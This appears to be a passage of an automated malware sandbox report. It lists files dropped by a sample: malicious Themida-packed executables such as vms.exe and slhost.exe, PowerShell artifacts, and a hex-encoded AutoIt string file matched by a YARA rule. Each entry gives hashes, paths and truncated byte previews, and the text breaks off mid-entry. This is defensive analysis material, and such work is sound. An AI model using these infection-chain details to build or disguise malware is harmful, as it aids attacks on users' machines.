                                                                                                                                                                                SHA-256:5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2
                                                                                                                                                                                SHA-512:33794A567C3E16582DA3C2AC8253B3E61DF19C255985277C5A63A84A673AC64899E34E3B1EBB79E027F13D66A0B8800884CDD4D646C7A0ABE7967B6316639CF1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.@............yGI......p\.}....pJ......p[.............._.....................pP......ZJ......ZK.......H......pN.....Rich............................PE..d...(..K..........#......\...*......|..........@.....................................N........@...............@.................................T................j...Q.. ............................................................p...............................text....Z.......\.................. ..`.rdata...V...p...X...`..............@..@.data............v..................@....pdata...j.......l..................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\slhost[1].exe
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):5
                                                                                                                                                                                Entropy (8bit):1.5219280948873621
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:hn:h
                                                                                                                                                                                MD5:FDA44910DEB1A460BE4AC5D56D61D837
                                                                                                                                                                                SHA1:F6D0C643351580307B2EAA6A7560E76965496BC7
                                                                                                                                                                                SHA-256:933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
                                                                                                                                                                                SHA-512:57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: 0....
                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):18817
                                                                                                                                                                                Entropy (8bit):5.001217266823362
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:ufib4GGVoGIpN6KQkj2Akjh4iUxGzCdaOdB/NXp5CvOjJEYoV4fib41:uIGV3IpNBQkj25h4iUxGzCdaOdB/NZwY
                                                                                                                                                                                MD5:DB93B232EFF0785FDDC28A0D5DAE38D2
                                                                                                                                                                                SHA1:AF5AFE47557C49F165F66B2B63962D9EB28E3157
                                                                                                                                                                                SHA-256:92939214003421B64153B215D15F89595673C709110FC6E005FF955F6684C390
                                                                                                                                                                                SHA-512:5D161CFEE2631553AC2FA8EE407FE4CBA23C9A666BB69049C0FCCBEE99413983C678E4779426532FB4F5E622155C9EFF8DA57CD93AE4453D57301B32C19CBAA9
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1288
                                                                                                                                                                                Entropy (8bit):5.356149890382935
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:3FPpQrLAo4KAxCoOu42qs5qRPnZe9t4CvKaRSF8PJKnKmh0/:1PerB4BOu/q8qRBe9t4CvpR48B4y
                                                                                                                                                                                MD5:2AF59A43D969E646816E09736F1D2AB4
                                                                                                                                                                                SHA1:64BCE68EA11CB35CCB7832B2374BC7ADCC335F88
                                                                                                                                                                                SHA-256:75D5A94618C89F4D09BAEFF3BD38B567118C6CD09D9ED94C0342E5F14CEB3C4F
                                                                                                                                                                                SHA-512:FE505467C2F471901E6BD01DAF5BB44919B0DD9467439845F9BCD596B6982327D1210B64E849A041AF926B2D870B6CE562F1DB7588081D8729BACE6DCA4D5752
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.Automation4...............T..'Z..N..Nvj.G.........System.Data.4................Zg5..:O..g..q..........System.Xml..<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServicesL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementT...............}0.2...K.............*.Microsoft.Management.Inf
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\152138533219
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):84933
                                                                                                                                                                                Entropy (8bit):7.8972233603614335
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:CbQLRDlaHIWKpDf9Xf4PYWFuXQoH0Nn7/cYAoy48gE0EtAK61F6Wdn:MoDlaHfKFVXf4PYcuAoH0N7/voH0El6r
                                                                                                                                                                                MD5:2D87792FF4725700B76F5C0A720AFA54
                                                                                                                                                                                SHA1:61A955980C7DE7B74BB753D6AA154D0EC0327C80
                                                                                                                                                                                SHA-256:B384113FC6EF6E5349C412363EFAC9D3A1E9155A2D0125EA04EB2BD7E23F57F0
                                                                                                                                                                                SHA-512:2CD98A89DF59D3C67BBC7A6F743DCCF4D1B60F6EB8E32021E12E6DB4C15483A4FEF293FDE902035FCA4A04E80B2418B151EB3EDDC0954E34C672EA655D39584B
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: ......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.|..).?.H.'.|....).?m.....h.t......|4.%...d....
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\20211111\PowerShell_transcript.414408.J9+LpGNM.20211111122714.txt
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):592
                                                                                                                                                                                Entropy (8bit):5.316779348941694
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:57DtSA6NYgH7qP3fL5o6x2DOzzUjjIneWoHPw6jewGxMKjX4CIymgSs2uKJXwv:BxSAVgH7qPvNjx2DOXUWeW+HjeTKKjXR
                                                                                                                                                                                MD5:BF694EFB6A7A7A1D03E82C3C03D9AA94
                                                                                                                                                                                SHA1:90F935A0986544F9C5BF5B914012047D6E4FC747
                                                                                                                                                                                SHA-256:132DC8450D3BC254C0B5290FEB9310BB390155554B8A0C804CAC797CBC1AF830
                                                                                                                                                                                SHA-512:637E1C13A49C11CCCFE039E677DC907E4D85EBD9A93E12FF0C860A361147D3784B5019CE01AB8F497988B6714C3119248FC2E00A553E63A5BE14787E653872AB
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20211111122715..Username: WORKGROUP\SYSTEM..RunAs User: WORKGROUP\SYSTEM..Configuration Name: ..Machine: 414408 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe..Process ID: 1056..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\vms.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2776885
                                                                                                                                                                                Entropy (8bit):7.952282916619779
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:49152:+8Nm2ODRAk970Bzcw/CcGFJ1ue8rvks1BNdz8mbBsyjcvDUmFI4tN8gjSOrsH6qd:FNHMAkp0B4waD3ev71/dYmFNcvHFIc8Z
                                                                                                                                                                                MD5:2BC350586FBDE00FFF7707D69C30941F
                                                                                                                                                                                SHA1:AA7181D7AE05C16C88B3DFC720B815164E56C95A
                                                                                                                                                                                SHA-256:622B2028D5C433225C33AB915D35A990A202B4E7F3F3E8F7DCE8E0F483D835C1
                                                                                                                                                                                SHA-512:FF23EF9A65D5D6B97F9DA9AE13764CCEDF1442A8A73277B3AB3C6AEEB0656A3BE64C7FFF8DE9B4485B2B0EF4DD5CAD2493B8B79B5A71709EE9BC70D993EDD5E3
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........................:........p....p....p...........:...>....>.X...>....Rich............................PE..L...F%.a.................^..........X@E......p....@.......................... n......*...@........................................................................................................................................................ V\......h".................. ..` 0....p..97...(..............@..@ tE...........`..............@... .....P.......b..............@..@ .....`..g....d..............@..B.imports.............~..............@....rsrc...............................@..@.themida..A.........................`....boot.....(..@E.5.(.................`..`................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_od5ut3cu.kpw.psm1
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: 1
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oodz0xzw.snv.psm1
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: 1
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uyicbxz2.fm2.ps1
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: 1
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xjwyjadm.tue.ps1
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: 1
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\aut5FC5.tmp
                                                                                                                                                                                Process:C:\ProgramData\UpSys.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):25822
                                                                                                                                                                                Entropy (8bit):7.676686877584948
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:X4ltkgfpZ92EBn80hR2u5k+G2qqTswsOWDK4dQS97hJw:X4bx9780/k+1TLs3FGOi
                                                                                                                                                                                MD5:436C1BB98DEECCECB73FAD945F1DD3DC
                                                                                                                                                                                SHA1:774313BA911945589971BBC73498D81F060DABE6
                                                                                                                                                                                SHA-256:05EAE1691149CC66E458D5E5B4430BD3B938B278B8BDB2C887A13C9871004C51
                                                                                                                                                                                SHA-512:66EA41B9B4A42F7C40D1CE5B6E82A6F03E8489648B912D96A81EFA13D340D4D651078DF7C1302C595CA83408E7208D1D79F02165DC27383952A9ABE7F851C3E2
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: ..%...F:.Q&.Y..o4.M&.Y..mC.Lf.)..k6..f.9..T.M.Y..kF....(.I5.M..I..i7.....1....Y..k7.."@...o2.L.......L&....i6.L.....m9..(..@....N......8..2.Y..o4.*fs...g5.4......h.MfSp.`.[.* ..1..&.....2.M.Sy...2.P.......M...X.M&`...Q5... ....7...T@..e3.L.39....L.s..mM@M..fiE.Lf.I...K....mF.Q.A...a5.M....E.4.r...n......@.6@K../.k8..s@./......"....E...f.i..k8..&.0..a2.L.....s2...T`..j.y...m7.L&.9.......Y.(..4...z......... ....L.......T.A.i..o4.f.... .H....`'....DH.......@.....H...2..&.`!Bo3...p.\..@#.,Fr.T..l...R.y....{......Z...@............G.(...hL.S ...6.:..B..........1..@.>@1..0.N.@L.#.....@.....7....>I..iB..(.....@..$..#.....F.M.\...i6.......I..x.9.....M@.0...9@....@....".(..`.....fi4.t..0...& ...j.4L.....L. .Y..g3Y...f .H...1.4....@....jf..P@..5..h.#@%.4.....h........&.....c5...}.z... ...d.(.M..>0.O.kB.Q.T...e2...tY......H*.....V..0.c.T....@......... :..P.....;..P...Vd...x[.L.........CjkC...|SP*..!.bA...L..|...#.2.0@#..'...<..b....D .........h.}..K......mB..r8.-...| m.....i.&@w...@_
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\autA6FF.tmp
                                                                                                                                                                                Process:C:\ProgramData\UpSys.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):25822
                                                                                                                                                                                Entropy (8bit):7.676686877584948
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:X4ltkgfpZ92EBn80hR2u5k+G2qqTswsOWDK4dQS97hJw:X4bx9780/k+1TLs3FGOi
                                                                                                                                                                                MD5:436C1BB98DEECCECB73FAD945F1DD3DC
                                                                                                                                                                                SHA1:774313BA911945589971BBC73498D81F060DABE6
                                                                                                                                                                                SHA-256:05EAE1691149CC66E458D5E5B4430BD3B938B278B8BDB2C887A13C9871004C51
                                                                                                                                                                                SHA-512:66EA41B9B4A42F7C40D1CE5B6E82A6F03E8489648B912D96A81EFA13D340D4D651078DF7C1302C595CA83408E7208D1D79F02165DC27383952A9ABE7F851C3E2
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: ..%...F:.Q&.Y..o4.M&.Y..mC.Lf.)..k6..f.9..T.M.Y..kF....(.I5.M..I..i7.....1....Y..k7.."@...o2.L.......L&....i6.L.....m9..(..@....N......8..2.Y..o4.*fs...g5.4......h.MfSp.`.[.* ..1..&.....2.M.Sy...2.P.......M...X.M&`...Q5... ....7...T@..e3.L.39....L.s..mM@M..fiE.Lf.I...K....mF.Q.A...a5.M....E.4.r...n......@.6@K../.k8..s@./......"....E...f.i..k8..&.0..a2.L.....s2...T`..j.y...m7.L&.9.......Y.(..4...z......... ....L.......T.A.i..o4.f.... .H....`'....DH.......@.....H...2..&.`!Bo3...p.\..@#.,Fr.T..l...R.y....{......Z...@............G.(...hL.S ...6.:..B..........1..@.>@1..0.N.@L.#.....@.....7....>I..iB..(.....@..$..#.....F.M.\...i6.......I..x.9.....M@.0...9@....@....".(..`.....fi4.t..0...& ...j.4L.....L. .Y..g3Y...f .H...1.4....@....jf..P@..5..h.#@%.4.....h........&.....c5...}.z... ...d.(.M..>0.O.kB.Q.T...e2...tY......H*.....V..0.c.T....@......... :..P.....;..P...Vd...x[.L.........CjkC...|SP*..!.bA...L..|...#.2.0@#..'...<..b....D .........h.}..K......mB..r8.-...| m.....i.&@w...@_
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\jonmpkl
                                                                                                                                                                                Process:C:\ProgramData\UpSys.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):83514
                                                                                                                                                                                Entropy (8bit):3.495672104133364
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:QxUzapK6b5Hg7OoSZ9f7fOxrIGyiBquTsR3cgwO0wNP02:wo8GQ
                                                                                                                                                                                MD5:940B1915CADEE0E2B33D80799816F6C7
                                                                                                                                                                                SHA1:2C10E4FEC3E8C054055D1ED78757117575F273F2
                                                                                                                                                                                SHA-256:81E89E7266CFE5158E44F5578C8BE61353E781DAEBDD47A33597E9EC503D379C
                                                                                                                                                                                SHA-512:CC3C574FD5392C1B54146B591E22B1C01C95E34A602C403AD96C49B7EE6AD31D1478A00CC1334286ADDC5CB94496372A172745E9AD20554023E1E22C7DA1E1C5
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: C:\Users\user\AppData\Local\Temp\jonmpkl, Author: Florian Roth
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: 4D7573744465636C61726556617273!7ET4755495F52554E4445464D5347!7ET47554944617461536570617261746F7243686172!7ET20404C4620!7ET57696E44657465637448696464656E54657874!7ET312E35!7ET506F77657252756E!7ET202D20417574686F7220627920426C75654C696665!7ET5B434C4153533A506F77657252756E3A76!7ET5D!7ET323031362D32303231!7ET2040557365724E616D6520!7ET2040436F6D70696C656420!7ET20404175746F497445786520!7ET20404F534172636820!7ET20404175746F497458363420!7ET20404F5356657273696F6E20!7ET20404F5356657273696F6E20!7ET5F2858507C32303028307C332929!7ET4F7065726174696E672053797374656D204E6F7420537570706F7274656421!7ET546F20737461727420736F66747761726520796F75206D75737420686176652041646D696E6973747261746F722072696768747321!7ET204053637269707444697220!7ET204057696E646F777344697220!7ET53797374656D33325C!7ET2040576F726B696E6744697220!7ET6B65726E656C33322E646C6C!7ET7573657233322E646C6C!7ET61647661706933322E646C6C!7ET7368656C6C33322E646C6C!7ET6F6C6533322E646C6C!7ET73686C776170692E646C6C!7ET67646933322E646C6C!7ET484B4C4D!7ET48
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                Process:C:\Users\user\Desktop\We7WnoqeXe.exe
                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3731093
                                                                                                                                                                                Entropy (8bit):7.963381234764433
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:49152:ow1YTv0RwUXD+CToQI4VavPdKbks6qaQ/dFNsDJf7WNcVK0k2PDNjSmjar45gOJL:0TcRwmS3dKRV/RsJWij87suW
                                                                                                                                                                                MD5:7663A0F9957107E7EF91C493A3C85261
                                                                                                                                                                                SHA1:975BFCB456E949119FD3FDD27A57247DB8F48E7B
                                                                                                                                                                                SHA-256:6C2B6603896FFE67A44133291B0DD2C8EF877444A60D6B65F8F2A8F133FFD80F
                                                                                                                                                                                SHA-512:ABA83BA941148C6EC42EF1DAC969DB55A1350F60035AAF695CF5B7CF85A3277E2668D66477ACB33E0147DBB66C1B3BC0C09F191120DA967934226A85F3A57F79
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......v...2...2...2...&.9...&...T.B.3...`.#...`.8...`.|.....#.....1...&.&...&.3...&.#...2.........0.....@.3.....3...Rich2...................PE..d.....`a.........."..........|........b........@......................................9...`..................................................@..<....P.......x`..:.................................................................................................. .........H.................. ..` ........r....N..............@..@ ./......<....>..............@... .:......s!...D..............@..@ .............f..............@..@ ..... .......h..............@..@ .....0.......j..............@..B.imports.....@.......r..............@....rsrc........P.......v..............@..@.themida..Z..`.......x..............`....boot....x5...b..v5..x..............`..`........
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\slhost\slhost.exe
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3731093
                                                                                                                                                                                Entropy (8bit):7.963381234764433
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:49152:ow1YTv0RwUXD+CToQI4VavPdKbks6qaQ/dFNsDJf7WNcVK0k2PDNjSmjar45gOJL:0TcRwmS3dKRV/RsJWij87suW
                                                                                                                                                                                MD5:7663A0F9957107E7EF91C493A3C85261
                                                                                                                                                                                SHA1:975BFCB456E949119FD3FDD27A57247DB8F48E7B
                                                                                                                                                                                SHA-256:6C2B6603896FFE67A44133291B0DD2C8EF877444A60D6B65F8F2A8F133FFD80F
                                                                                                                                                                                SHA-512:ABA83BA941148C6EC42EF1DAC969DB55A1350F60035AAF695CF5B7CF85A3277E2668D66477ACB33E0147DBB66C1B3BC0C09F191120DA967934226A85F3A57F79
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......v...2...2...2...&.9...&...T.B.3...`.#...`.8...`.|.....#.....1...&.&...&.3...&.#...2.........0.....@.3.....3...Rich2...................PE..d.....`a.........."..........|........b........@......................................9...`..................................................@..<....P.......x`..:.................................................................................................. .........H.................. ..` ........r....N..............@..@ ./......<....>..............@... .:......s!...D..............@..@ .............f..............@..@ ..... .......h..............@..@ .....0.......j..............@..B.imports.....@.......r..............@....rsrc........P.......v..............@..@.themida..Z..`.......x..............`....boot....x5...b..v5..x..............`..`........
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\vms.exe
                                                                                                                                                                                Process:C:\Users\user\Desktop\We7WnoqeXe.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2776885
                                                                                                                                                                                Entropy (8bit):7.952282916619779
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:49152:+8Nm2ODRAk970Bzcw/CcGFJ1ue8rvks1BNdz8mbBsyjcvDUmFI4tN8gjSOrsH6qd:FNHMAkp0B4waD3ev71/dYmFNcvHFIc8Z
                                                                                                                                                                                MD5:2BC350586FBDE00FFF7707D69C30941F
                                                                                                                                                                                SHA1:AA7181D7AE05C16C88B3DFC720B815164E56C95A
                                                                                                                                                                                SHA-256:622B2028D5C433225C33AB915D35A990A202B4E7F3F3E8F7DCE8E0F483D835C1
                                                                                                                                                                                SHA-512:FF23EF9A65D5D6B97F9DA9AE13764CCEDF1442A8A73277B3AB3C6AEEB0656A3BE64C7FFF8DE9B4485B2B0EF4DD5CAD2493B8B79B5A71709EE9BC70D993EDD5E3
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........................:........p....p....p...........:...>....>.X...>....Rich............................PE..L...F%.a.................^..........X@E......p....@.......................... n......*...@........................................................................................................................................................ V\......h".................. ..` 0....p..97...(..............@..@ tE...........`..............@... .....P.......b..............@..@ .....`..g....d..............@..B.imports.............~..............@....rsrc...............................@..@.themida..A.........................`....boot.....(..@E.5.(.................`..`................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\vms\vms.exe
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2588967
                                                                                                                                                                                Entropy (8bit):7.9559285316110975
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:49152:7n/kTWwbJFn/319/caDkOUjFX10G53Mq1SA6DiW+rkdciAC+6Lh82j+7AcK:7n/atdNwjFXt5dB77t6Lhz+ccK
                                                                                                                                                                                MD5:34CCA2013EB9B2941A65971919BF356D
                                                                                                                                                                                SHA1:59F15A169B6C42340849A609EDB146E2F6614076
